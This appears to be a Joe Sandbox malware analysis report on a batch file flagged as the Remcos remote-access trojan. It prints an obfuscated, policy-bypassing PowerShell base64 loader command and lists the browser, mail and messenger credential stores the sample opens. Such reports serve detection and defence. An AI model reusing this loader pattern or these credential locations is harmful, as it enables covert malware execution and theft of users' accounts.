yeyagicbrbhjnciagv3jpa2xyz3j0zs1ib2tscmdyc3qgilnrbhjncnlzdgvta2xyz3igrxjyb2tscmdycjogqm
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command "[text.encoding]::utf8.getstring([convert]::frombase64string('dqoncirzy3jpchrdb250zw50id0gqccncir1c2vya2xyz3joyw1ligtscmdypsakzw5rbhjncny6vvnfa2xyz3jstkfnrwtscmdyoyrqbwrrbhjncm9tid0ga2xyz3iiqzpcvwtscmdyc2vyc1xrbhjncir1c2vya2xyz3joyw1lxgtscmdyzhdtlmjrbhjncmf0ijtpa2xyz3jmichuzwtscmdyc3qtugfrbhjncnroicrqa2xyz3jtzg9tkwtscmdyihsgicbrbhjncibxcml0a2xyz3jlluhvc2tscmdydcaiqmfrbhjncnrjacbma2xyz3jpbgugzmtscmdyb3vuzdprbhjnciakam1ka2xyz3jvbsiglwtscmdyrm9yzwdrbhjncnjvdw5ka2xyz3jdb2xvcmtscmdyien5yw5rbhjncjsgicaga2xyz3ikzmlszwtscmdytgluzxnrbhjncia9iftta2xyz3j5c3rlbwtscmdylklplkzrbhjncmlszv06a2xyz3i6umvhzgtscmdyqwxstglrbhjncm5lcygka2xyz3jqbwrvbwtscmdylcbbu3lrbhjncnn0zw0ua2xyz3juzxh0lmtscmdyrw5jb2rrbhjncmluz106a2xyz3i6vvrgogtscmdyktsgicbrbhjncibmb3jla2xyz3jhy2ggkgtscmdyjgxpbmvrbhjncibpbiaka2xyz3jmawxltgtscmdyaw5lcylrbhjncib7icaga2xyz3igicagigtscmdyawygkcrrbhjncmxpbmuga2xyz3itbwf0y2tscmdyacanxjprbhjncjo6id8oa2xyz3iukykkj2tscmdyksb7icbrbhjnciagicaga2xyz3igicagigtscmdyv3jpdgvrbhjnci1ib3n0a2xyz3igikluamtscmdyzwn0aw9rbhjncm4gy29ka2xyz3jligrldgtscmdyzwn0zwrrbhjncibpbib0a2xyz3jozsbiywtscmdydgnoigzrbhjncmlszs4ia2xyz3igluzvcmtscmdyzwdyb3vrbhjncm5kq29sa2xyz3jvcibdewtscmdyyw47icbrbhjnciagicaga2xyz3igicagigtscmdydhj5ihtrbhjnciagicaga2xyz3igicagigtscmdyicagicbrbhjnciakzgvja2xyz3jvzgvkqmtscmdyexrlcybrbhjncj0gw1n5a2xyz3jzdgvtlmtscmdyq29udmvrbhjncnj0xto6a2xyz3jgcm9tqmtscmdyyxnlnjrrbhjncln0cmlua2xyz3jnkcrtywtscmdydgnozxnrbhjnclsxxs5ua2xyz3jyaw0okwtscmdyktsgicbrbhjnciagicaga2xyz3igicagigtscmdyicagjglrbhjncm5qzwn0a2xyz3jpb25db2tscmdyzgugpsbrbhjnclttexn0a2xyz3jlbs5uzwtscmdyehqurw5rbhjncmnvzglua2xyz3jnxto6vwtscmdybmljb2rrbhjncmuur2v0a2xyz3jtdhjpbmtscmdyzygkzgvrbhjncmnvzgvka2xyz3jcexrlc2tscmdyktsgicbrbhjnciagicaga2xyz3igicagigtscmdyicagv3jrbhjncml0zs1ia2xyz3jvc3qgimtscmdysw5qzwnrbhjncnrpb24ga2xyz3jjb2rligtscmdyzgvjb2rrbhjncmvkihn1a2xyz3jjy2vzc2tscmdyznvsbhlrbhjnci4iic1ga2xyz3jvcmvncmtscmdyb3vuzenrbhjncm9sb3iga2xyz3jhcmvlbmtscmdyoyagicbrbhjnciagicaga2xyz3igicagigtscmdyicbxcmlrbhjncnrlluhva2xyz3jzdcairwtscmdyegvjdxrrbhjncmluzybpa2xyz3juamvjdgtscmdyaw9uignrbhjncm9kzs4ua2xyz3iuiiatrmtscmdyb3jlz3jrbhjncm91bmrda2xyz3jvbg9yigtscmdywwvsbg9rbhjncnc7icaga2xyz3igicagigtscmdyicagicbrbhjnciagielua2xyz3j2b2tllwtscmdyrxhwcmvrbhjncnnzaw9ua2xyz3igjgluamtscmdyzwn0aw9rbhjncm5db2rla2xyz3i7icagigtscmdyicagicbrbhjnciagicaga2xyz3igigjyzwtscmdyyws7icbrbhjnciagicaga2xyz3igicagigtscmdyfsbjyxrrbhjncmnoihsga2xyz3igicagigtscmdyicagicbrbhjnciagicaga2xyz3jxcml0zwtscmdyluhvc3rrbhjnciairxjya2xyz3jvcibkdwtscmdycmluzybrbhjncmrly29ka2xyz3jpbmcgb2tscmdyciblegvrbhjncmn1dglua2xyz3jnigluamtscmdyzwn0aw9rbhjncm4gy29ka2xyz3jloiakx2tscmdyiiatrm9rbhjncnjlz3jva2xyz3j1bmrdb2tscmdybg9yifjrbhjncmvkoyaga2xyz3igicagigtscmdyicagicbrbhjncn07icaga2xyz3igicagigtscmdyftsgicbrbhjncib9o30ga2xyz3jlbhnligtscmdyeyagicbrbhjnciagv3jpa2xyz3j0zs1ib2tscmdyc3qgilnrbhjncnlzdgvta2xyz3igrxjyb2tscmdycjogqm			Jump to behavior

Source: powershell.exe, 00000005.00000002.3680732491.0000000008454000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerN
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerH
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerh
Source: powershell.exe, 00000005.00000002.3680732491.0000000008454000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManageryNY
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerf
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3664111181.0000000003223000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManageruTWVtb2A
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managera
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerB
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager0
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerM
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager1310004
Source: powershell.exe, 00000005.00000002.3664111181.000000000327B000.00000004.00000020.00020000.00000000.sdmp, kalmzots.dat.5.dr	Binary or memory string: [2025/03/16 21:04:39 Program Manager]
Source: powershell.exe, 00000005.00000002.3680732491.0000000008454000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerGN;
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managered4da35
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managert
Source: powershell.exe, 00000005.00000002.3680732491.0000000008454000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerZN>
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager247adc3
Source: powershell.exe, 00000005.00000002.3680600008.0000000008407000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3664111181.000000000326B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: powershell.exe, 00000005.00000002.3677060324.0000000007571000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager[

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_10002933 cpuid

5_2_10002933

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_10002264

Source: C:\Windows\SysWOW64\recover.exe

Code function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

13_2_004082CD

Source: C:\Windows\SysWOW64\recover.exe

Code function: 12_2_004192F2 GetVersionExW,

12_2_004192F2

Source: C:\Windows\SysWOW64\recover.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Batch Injector

Source: Yara match	File source: amsi32_7976.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kalmzots.dat, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\recover.exe	Code function: ESMTPPassword	13_2_004033F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	13_2_00402DB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	13_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 5.2.powershell.exe.b820000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.recover.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.b820000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.recover.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3694477721.000000000B820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1571994329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: recover.exe PID: 7544, type: MEMORYSTR

Remote Access Functionality

Yara detected Batch Injector

Source: Yara match	File source: amsi32_7976.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR

Yara detected Remcos RAT

Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.8a51288.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3682683919.0000000008B29000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3682024098.0000000008A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7976, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kalmzots.dat, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	111 Native API	1 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	12 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	22 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	2 Obfuscated Files or Information	11 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	21 PowerShell	Logon Script (Windows)	112 Process Injection	1 Software Packing	2 Credentials in Registry	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	1 Credentials In Files	28 System Information Discovery	Distributed Component Object Model	11 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	31 Security Software Discovery	SSH	2 Clipboard Data	22 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report z310517827.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
z310517827.bat